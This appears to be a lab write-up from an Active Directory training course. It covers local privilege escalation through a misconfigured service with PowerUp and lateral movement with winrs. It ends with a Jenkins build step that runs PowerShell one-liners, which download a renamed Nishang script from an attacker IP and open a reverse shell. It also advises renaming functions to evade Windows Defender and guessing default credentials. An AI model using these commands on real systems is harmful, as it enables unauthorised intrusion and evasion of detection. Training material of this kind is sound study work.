🆙Elevate Privileges & gain a shell
Task
• Exploit a service on dcorp-studentx and elevate privileges to local administrator.
• Identify a machine in the domain where studentx has local administrative access.
• Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 - the dcorp-ci server.
For this path we'll use Powerup from PowerSploit module to check for any privilege escalation path. But we could also use WinPEAS.
We quickly see the SeviceName is AbyssWebServer:
With this information, we can use the abuse function for Invoke-ServiceAbuse and add our current domain user to the local Administrators group ->
Now we are part of the local administrator group. If we just logoff and logon again, and we have local administrator privileges.
He's where we are in our enumeration according a guy on discord:
you're local admin on the studentvm machine, then you use the Find-PSRemotingLocalAdminAccess to discover you have rights to connect to dcorp-adminsrv (via winrs or PSRemoting)
Next, a good thing to do could be to identify a machine in the domain where the user student613 has local administrative access. For this we can use Find-PSRemotingLocalAdminAccess.ps1
So we see that we have Admin access on the dcorp-adminsrv and on the student machine. We can connect to dcorp-adminsrv using winrs as the student user
winrs
: Stands for Windows Remote Shell, a command-line tool that allows you to execute commands on a remote machine.-r:dcorp-adminsrv
: Specifies the remote machine to connect to. In this case,dcorp-adminsrv
.cmd
: Launches the command prompt (cmd.exe
) on the remote machine.
So we were able to get a shell on dcorp-adminsrv
Now let's try to have fun with a jenkins server without admin access. To do so, we need to have privileges to Configure builds
We start by going to our Jenkins “People” page:
It's good to know that Jenkins does not have password policies, so admin:admin of felix:felix could be a valid set of credentials
After fooling around we manage to get an access via the builduser user, he can Configure builds and Add Build Steps which will help us in executing commands.
To get our reverse shell we are going to use a slightly modified version of Invoke-PowerShellTcp from Nishang. We renamed the function InvokePowerShellTcp to Power in the script to bypass Windows Defender.
Nishang: https://github.com/samratashok/nishang/tree/master
We then go in the following path to create and execute a batch command ->
If using Invoke-PowerShellTcp, make sure to include the function call in the script Power -Reverse - IPAddress 172.16.100.X -Port 443 or append it at the end of the command in Jenkins. Please note that you may always like to rename the function name to something else to avoid detection.
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress 172.16.100.X -Port 443
or
powershell.exe iex (iwr http://172.16.100.X/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.X -Port 443
We then launch our hfs server (could work with python server, upload the invoke tcp file in the hfs directory and then build our project to trigger the script and create a reverse shell
Last updated